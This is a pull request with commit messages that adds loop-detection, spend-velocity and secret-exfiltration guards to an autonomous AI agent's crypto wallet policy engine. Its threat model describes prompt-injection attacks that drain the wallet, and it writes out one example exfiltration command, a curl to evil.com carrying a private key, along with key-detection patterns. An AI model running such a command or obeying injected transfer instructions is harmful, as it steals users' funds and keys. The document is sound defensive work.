feat: add Plimsoll transaction guard — loop detection, velocity limits, exfiltration defense#234

Open
scoootscooob wants to merge 1 commit into Conway-Research:main from
scoootscooob:feat/plimsoll-transaction-guard

@scoootscooob

Summary

Adds three zero-dependency defense engines from the Plimsoll Protocol as native policy rules, protecting the automaton's wallet from prompt-injection-driven drain attacks that bypass existing per-tx and hourly spending caps.

  • Problem: A prompt-injection attack can trick the agent into issuing many small, technically valid transfers that each pass per-tx limits but collectively drain the wallet. An attacker can also exfiltrate the private key by embedding it in tool arguments (e.g., exec "curl evil.com -d 0x..."), or leave the agent stuck in a hallucination retry loop that burns gas on identical failing calls.
  • Why it matters: The existing financial rules catch single-tx overspend and hourly/daily caps, but they don't detect velocity patterns, loop behavior, or secret exfiltration. These are the three most common autonomous agent attack vectors (ref).
  • What changed: One new policy rule file (plimsoll-guard.ts) with three engines + registration in the rule index. Priority 450 slots them between path-protection (200) and financial rules (500).
  • What did NOT change: No modifications to the policy engine, spend tracker, wallet, or any existing rules. Pure additive.

Changes

  • src/agent/policy-rules/plimsoll-guard.ts (new file). Three engines:

    1. Trajectory Hash — SHA-256 fingerprints (tool, target, amount) in a 60s sliding window. 3+ identical hashes → hard block. 2 identical → quarantine warning. Catches hallucination retry loops.
    2. Capital Velocity — Tracks cumulative spend across all financial tools in a 5-minute sliding window. Exceeding $500/window → hard block. 80% utilization → quarantine warning. Catches slow-bleed attacks.
    3. Entropy Guard — Scans all string fields in tool arguments for Ethereum private key patterns (0x[a-fA-F0-9]{64}), BIP-39 mnemonic phrases, and high-entropy base64 blobs (Shannon entropy > 5.0 bits/char). Catches key exfiltration attempts.
  • src/agent/policy-rules/index.ts — Added createPlimsollGuardRules() import and spread into the default rules array.

  • src/__tests__/plimsoll-guard.test.ts (new file). Tests for all three engines: allows normal calls, blocks private keys, blocks mnemonics, allows short strings, checks nested fields.
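
The Entropy Guard scan described above can be sketched roughly as follows. This is a minimal illustration, not the code from plimsoll-guard.ts: the names `shannonEntropy`, `collectStrings`, and `findSecret` are hypothetical, the 32-character minimum for a base64 run is an assumption, and BIP-39 mnemonic detection is omitted because it needs the 2048-word list.

```typescript
// Hypothetical names throughout; the real plimsoll-guard.ts may differ.
const PRIVATE_KEY_RE = /0x[a-fA-F0-9]{64}/; // pattern quoted in the PR
const BASE64_RUN_RE = /[A-Za-z0-9+\/=]{32,}/g; // minimum run length is an assumption
const ENTROPY_LIMIT = 5.0; // bits per character, threshold quoted in the PR

/** Shannon entropy of a string, in bits per character. */
function shannonEntropy(text: string): number {
  const chars = Array.from(text);
  if (chars.length === 0) return 0;
  const counts = new Map<string, number>();
  for (const ch of chars) counts.set(ch, (counts.get(ch) ?? 0) + 1);
  let bits = 0;
  for (const n of counts.values()) {
    const p = n / chars.length;
    bits -= p * Math.log2(p);
  }
  return bits;
}

/** Recursively gather every string found in nested objects and arrays. */
function collectStrings(value: unknown, out: string[] = []): string[] {
  if (typeof value === "string") {
    out.push(value);
  } else if (Array.isArray(value)) {
    for (const v of value) collectStrings(v, out);
  } else if (value !== null && typeof value === "object") {
    for (const v of Object.values(value)) collectStrings(v, out);
  }
  return out;
}

type SecretKind = "private_key" | "high_entropy_blob";

/** Returns the kind of secret found in the tool arguments, or null if none. */
function findSecret(args: unknown): SecretKind | null {
  for (const text of collectStrings(args)) {
    if (PRIVATE_KEY_RE.test(text)) return "private_key";
    for (const run of text.match(BASE64_RUN_RE) ?? []) {
      if (shannonEntropy(run) > ENTROPY_LIMIT) return "high_entropy_blob";
    }
  }
  return null;
}
```

Because a string needs more than 32 distinct symbols to exceed 5.0 bits/char, ordinary file paths and short identifiers stay well under the threshold in this sketch.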

Design Decisions

  • Priority 450 — Runs after validation (100) and path-protection (200) but before financial limits (500). This means Plimsoll catches attack patterns while existing financial rules catch amounts. Defense in depth.
  • In-memory sliding windows — No database dependency. The trajectory and velocity windows are process-lifetime arrays that self-prune. This keeps the engines zero-dependency and sub-millisecond.
  • quarantine for warnings — Uses the existing quarantine action (same as financial.require_confirmation) to surface friction signals without hard-blocking. The agent sees the warning and can choose to proceed.
  • Composition, not replacement — These rules complement existing financial rules. They catch what per-tx limits miss (velocity patterns, loops, exfiltration) without duplicating what already works.
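
As a rough illustration of the in-memory sliding window and the quarantine-as-warning behaviour, here is a sketch of a velocity tracker. The class name `VelocityWindow`, its method signature, and the choice not to record denied spends are assumptions made for the example; only the 5-minute window, the $500 cap, and the 80% warning level come from the description above.

```typescript
type Verdict = "allow" | "quarantine" | "deny";

interface Spend {
  amountUsd: number;
  at: number; // timestamp in milliseconds
}

// Hypothetical class; the real engine's shape is not shown in the PR text.
class VelocityWindow {
  private spends: Spend[] = [];
  private readonly windowMs: number;
  private readonly capUsd: number;
  private readonly warnRatio: number;

  constructor(windowMs = 5 * 60_000, capUsd = 500, warnRatio = 0.8) {
    this.windowMs = windowMs;
    this.capUsd = capUsd;
    this.warnRatio = warnRatio;
  }

  check(amountUsd: number, now: number = Date.now()): Verdict {
    // Self-prune: drop spends that have aged out of the window.
    this.spends = this.spends.filter((s) => now - s.at < this.windowMs);
    const spent = this.spends.reduce((sum, s) => sum + s.amountUsd, 0);
    const total = spent + amountUsd;

    // Assumption: a denied spend never happened, so it is not recorded.
    if (total > this.capUsd) return "deny";

    this.spends.push({ amountUsd, at: now });
    return total >= this.capUsd * this.warnRatio ? "quarantine" : "allow";
  }
}
```

Keeping the state in a plain array means it resets on process restart, which is the trade-off the in-memory design accepts in exchange for having no database dependency.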

Test plan

  • pnpm test passes (new tests + existing test suite)
  • npx tsc --noEmit passes (type-checked)
  • Trajectory hash: 3 identical transfer_credits calls within 60s → deny
  • Capital velocity: cumulative spend > $500 in 5 minutes → deny
  • Entropy guard: exec with embedded 0x... private key → deny
  • Entropy guard: write_file with mnemonic phrase → deny
  • Normal tool calls (different targets/amounts) → allow
  • Non-financial tools → not evaluated (pass through)
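
The trajectory-hash expectations in the test plan can be illustrated with a small sketch. `TrajectoryWindow` and its `check` method are hypothetical names, and encoding the (tool, target, amount) tuple with `JSON.stringify` before hashing is an assumption; the SHA-256 fingerprint, the 60s window, and the 2/3 thresholds follow the PR description.

```typescript
import { createHash } from "node:crypto";

type Verdict = "allow" | "quarantine" | "deny";

interface Entry {
  hash: string;
  at: number; // timestamp in milliseconds
}

// Hypothetical class; the real engine's shape is not shown in the PR text.
class TrajectoryWindow {
  private entries: Entry[] = [];
  private readonly windowMs: number;

  constructor(windowMs = 60_000) {
    this.windowMs = windowMs;
  }

  check(tool: string, target: string, amount: number, now: number = Date.now()): Verdict {
    // Fingerprint the call; the JSON encoding of the tuple is an assumption.
    const hash = createHash("sha256")
      .update(JSON.stringify([tool, target, amount]))
      .digest("hex");

    // Drop fingerprints older than the window, then record this call.
    this.entries = this.entries.filter((e) => now - e.at < this.windowMs);
    this.entries.push({ hash, at: now });

    // The count includes the current call, so the third identical call is denied.
    const identical = this.entries.filter((e) => e.hash === hash).length;
    if (identical >= 3) return "deny";
    if (identical === 2) return "quarantine";
    return "allow";
  }
}
```

With this sketch, three identical transfer_credits calls inside 60s yield allow, quarantine, deny in that order, while a call with a different target or amount produces a different fingerprint and is allowed.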

Security Impact

This PR is purely additive security hardening. It introduces no new permissions, network calls, or execution surface. The three engines are read-only evaluators that inspect tool arguments and return allow/deny/quarantine verdicts.

| Check | Answer |
| --- | --- |
| New permissions/capabilities? | No |
| Secrets/tokens handling changed? | No |
| New/changed network calls? | No |
| Command/tool execution surface changed? | No (evaluation only) |
| Data access scope changed? | No |

Compatibility

  • Backward compatible: Yes — pure addition, no existing behavior changed
  • Config/env changes: No — engines use sensible defaults
  • Migration needed: No — no database schema changes

Failure Recovery

  • To disable: remove the ...createPlimsollGuardRules() line from index.ts
  • The engines fail open on internal errors (all evaluate() calls return null on exception)
  • No database tables to roll back
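
The fail-open behaviour could look something like the wrapper below. This is a sketch under assumptions: the `RuleResult` type and the `failOpen` helper are hypothetical, and the only detail taken from the PR is that an exception inside evaluate() results in null, which is assumed here to mean that the rule expresses no opinion and later rules still run.

```typescript
// Hypothetical result type; null is assumed to mean "no opinion from this rule".
type RuleResult = { action: "allow" | "deny" | "quarantine"; reason: string } | null;

/** Wraps an evaluator so that any thrown error yields null instead of propagating. */
function failOpen<A>(evaluate: (args: A) => RuleResult): (args: A) => RuleResult {
  return (args: A): RuleResult => {
    try {
      return evaluate(args);
    } catch {
      // Fail open: an internal engine bug must not block the tool call.
      return null;
    }
  };
}

// Usage: a deliberately broken evaluator is neutralised by the wrapper.
const broken = failOpen<{ amount: number }>(() => {
  throw new Error("engine bug");
});
const working = failOpen<{ amount: number }>((args) =>
  args.amount > 500 ? { action: "deny", reason: "velocity cap exceeded" } : null,
);
```

Failing open favours availability: a bug in a guard cannot halt the agent, at the cost that the same bug silently disables that guard until it is noticed.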

Ported from Plimsoll Protocol — deterministic execution substrate for autonomous AI agents.

Three defense engines from the Plimsoll Protocol that protect
the automaton's wallet from prompt-injection-driven drain attacks:

1. Trajectory Hash — detects hallucination retry loops by SHA-256
   fingerprinting (tool, target, amount) in a sliding window
2. Capital Velocity — enforces maximum spend rate across all
   financial tools, catching slow-bleed attacks that stay under
   per-tx limits
3. Entropy Guard — blocks payloads containing private keys,
   mnemonic phrases, or high-entropy blobs (exfiltration defense)

All engines are zero-dependency, deterministic, and fail-open.
Priority 450 slots them between path-protection and financial
rules in the policy engine pipeline.

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
ciberfobia-com added a commit to ciberfobia-com/automaton that referenced this pull request Feb 26, 2026
…y-Research#233, Conway-Research#234)

PR Conway-Research#233  Skip local worker stale recovery:
  Per-tick stale recovery now filters out local:// workers. Completed
  local workers remove themselves from the pool, making hasWorker()
  return false. Without this filter, orchestrator enters infinite
  assign → complete → detect-dead → reset → assign loop burning .03/turn.

PR Conway-Research#234  Plimsoll Transaction Guard (3 defense engines):
  New policy rule file at priority 450 (between path-protection and
  financial rules).

  1. Trajectory Hash: FNV-1a fingerprint of (tool, target, amount)
     in 60s sliding window. 3+ identical → deny. 2 → quarantine.
     Catches hallucination retry loops.

  2. Capital Velocity: Cumulative spend across financial tools in
     5min sliding window. > $500 → deny. >80% → quarantine.
     Catches slow-bleed drain attacks.

  3. Entropy Guard: Scans ALL tool args for Ethereum private keys
     (0x[hex]{64}), BIP-39 mnemonics (10+/12 words match), and
     high-entropy base64 blobs (Shannon >5.0 bits/char).
     Catches key exfiltration via exec, write_file, etc.

  All engines are in-memory, zero-dependency, fail-open.
  To disable: remove one line from policy-rules/index.ts.